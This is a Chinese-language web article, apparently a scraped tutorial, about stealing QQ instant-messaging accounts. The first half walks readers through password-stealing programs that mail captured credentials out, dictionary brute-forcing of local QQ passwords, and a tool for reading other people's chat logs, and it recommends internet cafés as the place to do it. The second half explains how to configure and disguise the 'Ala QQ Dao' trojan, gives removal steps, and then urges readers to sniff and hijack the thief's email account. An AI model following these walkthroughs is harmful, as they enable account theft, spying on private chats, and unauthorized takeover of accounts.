该软件非常适合在网吧内使用，只要你在别的机器上配置好该软件，然后换一台机器上网，一旦别人用那台机器登陆QQ，当然是把他的QQ拱手相送了！

cmaedu.com二、无敌QQ密码盗取器

cmaedu.com该软件是一个后台监控类的盗取QQ的软件，同样需要邮箱配合使用，具体设置比较简单。

cmaedu.com运行该软件，配置窗口如图4。

　在该窗口中，你需要设置好的所使用邮箱的SMTP服务器地址及用户名和密码，为了保证信件能正常接收，设置完毕后最好点击“测试”按钮进行测试。

提示：

邮件标题不填则将以QQ号码为标题，另外，最好把“发送多少个号码”设置小点，这个功能很有用，一旦程序发送邮件的数目达到了这个数的时候就不再发送了，否则可能导致你的信箱被撑破。

　三、用QQ破密使者盗取QQ

cmaedu.comQQ破密使者是一个本地破解QQ密码的黑客工具，你可以选择字典暴力破解本地QQ密码,速度极快,并可自己设定延迟时间，下面看看具体的使用方法。

下载该软件并解压，其中“QQPW_Crack8”是安装程序，里面还有一个“破解字典”文件夹（图5），这是破解QQ密码所要用到的字典文件，里面有4个字典文件，当然你也可以自己制作一个字典工自己使用。安装完该软件后，就可以实践一下该软件的威力了！

首先运行该软件，软件主界面如图6所示。

cmaedu.com首先你需要配置“QQ路径”，点击“浏览”按钮找到QQ的主程序，“QQ号码”一栏中自动会显示用本机登陆的QQ号码，你只要选择其中一个即可，然后需要设置“字典路径”，点击后面的“浏览”按钮，找到字典文件所在位置，比如C:\WINDOWS\Desktop\新建文件夹\QQ破密使者\破解字典\dictionary1.txt，如图7。

设置好字典文件后，你还可以设置延迟时间，然后你就可以点击“开始破解”进行破解了！该软件会用字典文件中的密码一一尝试，破解过程如图8。

　提示：破解速度跟你的电脑速度有关，在破解过程中不要打开别的什么程序以免影响破解速度！这种方法非常适合于在网吧盗取别人的QQ号！

cmaedu.com四、轻松偷窥QQ2004聊天记录

　 随着QQ2004Beta的推出，广大“Q友”们又一次体验了新版本带给大家的惊喜，那么QQ2004Beta在安全性方面又怎么样呢？针对QQ2004Beta 推出的“QQ2004Beta免密码登陆器”也许同样会带给你一个“惊喜”！

使用“QQ2004Beta免密码登陆器”后，输入任意密码即可登陆QQ，这样你就可以偷窥他人的好友资料及聊天记录啦！注意该软件只适用于最新版本的QQ2004Beta。

cmaedu.com下载并解压该软件后，必须将其中的“cr-QQ2004Beta(7.13).exe”拷贝到你的QQ2004Beta安装目录，通常为“C:\Program Files\Tencent\qq”，否则直接运行该软件会出现找不到QQ.exe文件的提示！

cmaedu.com运行QQ2004Beta安装目录下的“cr-QQ2004Beta(7.13).exe”文件，弹出窗口如图9所示。

　点击“确定”按钮后弹出QQ正常的登陆界面，如图10。

这里你随便输入一个密码，然后点击“登录”即可登陆，但这时会弹出一个“请再次输入登录密码”的提示框，不要管它，但是千万不要点击“取消”，否则就QQ就自动关闭了，如图11。

这时QQ就离线登陆了，你可以查看他人的好友资料及聊天记录。需要注意的是：这样登陆的QQ聊天窗口是不能打开的，所以要查看聊天记录和好友资料，必须依次点击“菜单”→“好友与资料”→“消息管理器”才行，或者你在QQ主界面上用鼠标右击某个好友，然后选择“聊天记录”或者“查看资料”选项。

cmaedu.com主动出击 教你夺回被人盗走的QQ号码

很多朋友都有过QQ号被盗的经历，即使用“密码保护”功能找回来后，里面的Q币也已经被盗号者洗劫一空，碰到更恶毒的盗号者，还会将你的好友统统删除，朋友们将会永远得离开你。想过反击吗？什么，反击？别开玩笑了，我们只是菜鸟，不是黑客，我们只会看看网页，聊聊天，连QQ号是怎么被盗的都不知道，还能把盗号者怎么样呢？其实喜欢盗号的所谓“黑客”们，也只是利用了一些现成的盗号工具，只要我们了解了QQ号被盗的过程，就能作出相应防范，甚至由守转攻，给盗号者以致命一击。

一、知己知彼，盗号技术不再神秘

cmaedu.com 如今，还在持续更新的QQ盗号软件已经所剩无几，其中最为著名，流传最广的则非“啊拉QQ大盗”莫属，目前绝大多数的QQ号被盗事件都是由这个软件引起的。软件的使用条件很简单，只要你有一个支持smtp发信的邮箱或者一个支持asp脚本的网页空间即可。而且该木马可以将盗取的QQ号自动分为靓号和非靓号两种，并将它们分别发送到不同的信箱中，这也是“啊拉QQ大盗”如此流行的原因之一。接下来，便让我们先来了解一下其工作原理，以便从中找到反击的良方。

cmaedu.com 1、选择盗号模式

下载“啊拉QQ大盗”，解压后有两个文件：alaqq.exe、爱永恒，爱保姆qq.asp。其中alaqq.exe是“啊拉QQ大盗”的配置程序，爱永恒，爱保姆qq.asp是使用“网站收信”模式时需使用的文件。正式使用之前，还需要设置其参数。

cmaedu.com “邮箱收信”配置：运行alaqq.exe，出现程序的配置界面。在“发信模式选择”选项中选中“邮箱收信”，在“邮箱收信”填写电子邮箱地址（建议使用程序默认的163.com网易的邮箱）。这里以邮箱n12345@163.com（密码n_12345）为例来介绍“邮箱收信”模式时的配置，并进行下文中的测试。此外，在“收信箱（靓）”和“收信箱（普）”中可以填入不同的邮箱地址用来接受QQ靓号和普通QQ号。然后在“发信服务器”下拉框中选择自己邮箱相应的smtp服务器，这里是smtp.163.com。最后填入发信箱的帐号、密码、全称即可。

cmaedu.com 设置完毕后，我们可以来测试一下填写的内容是否正确，点击下方“测试邮箱”按钮，程序将会出现邮箱测试状态。如果测试的项目都显示成功，即可完成邮箱信息配置。

“网站收信”配置：除了选择“邮箱收信”模式之外，我们还可以选择“网站收信”模式，让盗取的QQ号码自动上传到指定的网站空间。当然，在使用之前，也需要做一些准备工作。

cmaedu.com 用FTP软件将爱永恒，爱保姆qq.asp上传支持ASP脚本的空间，运行alaqq.exe，在“Asp接口地址”中输入爱永恒，爱保姆qq.asp所在的URL地址，那么，当木马截获QQ号码信息后，就会将其保存于爱永恒，爱保姆qq.asp同目录下的qq.txt文件中。

cmaedu.com 2、设置木马附加参数

接下来我们进行高级设置。如果勾选“运行后关闭QQ”，对方一旦运行“啊拉QQ大盗”生成的木马，QQ将会在60秒后自动关闭，当对方再次登录QQ后，其QQ号码和密码会被木马所截获，并发送到盗号者的邮箱或网站空间中。此外，如果希望该木马被用于网吧环境，那就需要勾选“还原精灵自动转存”，以便系统重起后仍能运行木马。除这两项外，其他保持默认即可。

3、盗取QQ号码信息

cmaedu.com 配置完“啊拉QQ大盗”，点击程序界面中的“生成木马”，即可生成一个能盗取QQ号码的木马程序。我们可以将该程序伪装成图片、小游戏，或者和其他软件捆绑后进行传播。当有人运行相应的文件后，木马会隐藏到系统中，当系统中有QQ登录时，木马便会开始工作，将相关的号码及密码截取，并按照此前的设置，将这些信息发送到邮箱或者网站空间。

cmaedu.com 二、练就慧眼，让木马在系统中无处可逃

现在，我们已经了解了“啊拉QQ大盗”的一般流程，那么如何才能从系统中发现“啊拉QQ大盗”呢？一般来说，如果碰到了以下几种情况，那就应该小心了。

cmaedu.com ·QQ自动关闭。

·运行某一程序后其自身消失不见。

·运行某一程序后杀毒软件自动关闭。

·访问杀毒软件网站时浏览器被自动关闭。

·如果杀毒软件有邮件监控功能的，出现程序发送邮件的警告框。

·安装有网络防火墙（例如天网防火墙），出现NTdhcp.exe访问网络的警告。

cmaedu.com 出现上述情况的一种或多种，系统就有可能已经感染了“啊拉QQ大盗”。当然，感染了木马并不可怕，我们同样可以将其从系统中清除出去。

1、手工查杀木马。发现系统感染了“啊拉QQ大盗”后我们可以手工将其清除。“啊拉QQ大盗”运行后会在系统目录中的system32文件夹下生成一个名为NTdhcp.exe的文件，并在注册表的启动项中加入木马的键值，以便每次系统启动都能运行木马。我们首先要做的就是运行“任务管理器”，结束其中的木马进程“NTdhcp.exe”。然后打开资源管理器中的“文件夹选项”，选择其中的“查看”标签，将其中“隐藏受保护的操作系统文件”选项前面的勾去掉。接着进入系统目录中的system32文件夹，将NTdhcp.exe文件删除。最后进入注册表删除NTdhcp.exe键值，该键值位于HKEY_LOCAL_MACHINE\Software \Microsoft \Windows \Currentversion \Run。

cmaedu.com 2、卸载木马。卸载“啊拉QQ大盗”很简单，只要下载“啊拉QQ大盗”的配置程序，运行后点击其中的“卸载程序”按钮即可将木马完全清除出系统。

三、以退为进，给盗号者以致命一击

cmaedu.com 忙乎了半天，终于把系统中的“啊拉QQ大盗”彻底清除，那么，面对可恶的盗号者，我们是不是应该给他一个教训呢？

1、利用漏洞，由守转攻

cmaedu.com 这里所谓的“攻”，并不是直接入侵盗号者的电脑，相信这种“技术活”并不适合大家。这里只是从盗号软件几乎都存在的漏洞入手，从而给盗号者一个教训。

那么这个漏洞是什么呢？

cmaedu.com 从此前对“啊拉QQ大盗”的分析中可以看到，配置部分填写了收取QQ号码信息邮件的邮箱帐号和密码，而邮箱的帐号和密码都是明文保存在木马程序中的。因此，我们可以从生成的木马程序中找到盗号者的邮箱帐号和密码。进而轻松控制盗号者的邮箱，让盗号者偷鸡不成反蚀把米。

提示：以上漏洞仅存在于将QQ号码信息以邮件发送方式的木马，如果在配置“啊拉QQ大盗”的过程中选择使用网站接收的方式则不存在该漏洞。

2、网络嗅探，反夺盗号者邮箱

当木马截取到QQ号码和密码后，会将这些信息以电子邮件的形式发送到盗号者的邮箱，我们可以从这里入手，在木马发送邮件的过程中将网络数据包截取下来，这个被截获的数据包中就含有盗号者邮箱的帐号和密码。截取数据包时我们可以使用一些网络嗅探软件，这些嗅探软件可以很轻松得截取数据包并自动过滤出密码信息。

cmaedu.com ·x-sniff

cmaedu.com x-sniff是一款命令行下的嗅探工具，嗅探能力十分强大，尤其适合嗅探数据包中的密码信息。

cmaedu.com 将下载下来的x-sniff解压到某个目录中，例如“c：\”，然后运行“命令提示符”，在“命令提示符”中进入x-sniff所在的目录，然后输入命令“xsiff.exe

-pass -hide -log

pass.log”即可（命令含义：在后台运行x-sniff，从数据包中过滤出密码信息，并将嗅探到的密码信息保存到同目录下的pass.log文件中）。

嗅探软件设置完毕，我们就可以正常登录QQ。此时，木马也开始运行起来，但由于我们已经运行x-sniff，木马发出的信息都将被截取。稍等片刻后，进入x-sniff所在的文件夹，打开pass.log，便可以发现x-sniff已经成功嗅探到邮箱的帐户和密码。

cmaedu.com ·sinffer

cmaedu.com 可能很多朋友对命令行下的东西都有一种恐惧感，所以我们可以使用图形化的嗅探工具来进行嗅探。例如适合新手使用的sinffer。

运行sinffer之前，我们需要安装WinPcap驱动，否则sinffer将不能正常运行。

cmaedu.com 运行sinffer。首先我们需要为sinffer.exe指定一块网卡，点击工具栏上的网卡图标，在弹出的窗口中选择自己使用的网卡，点“OK”后即可完成配置。确定以上配置后，点击sinffer工具栏中的“开始”按钮，软件即开始了嗅探工作。

cmaedu.com 接下来，我们正常登陆QQ，如果嗅探成功，就会在sinffer的界面中出现捕获的数据包，其中邮箱帐号密码信息被很清晰得罗列了出来。

cmaedu.com 得到盗号者的邮箱帐号和密码以后，我们可以将其中的QQ号码信息邮件全部删除，或者修改他的邮箱密码，给盗号者一个教训，让我们菜鸟也正义一把。

cmaedu.com如果你看到最后你会看到这句话的：小心这些软件，里面有毒的。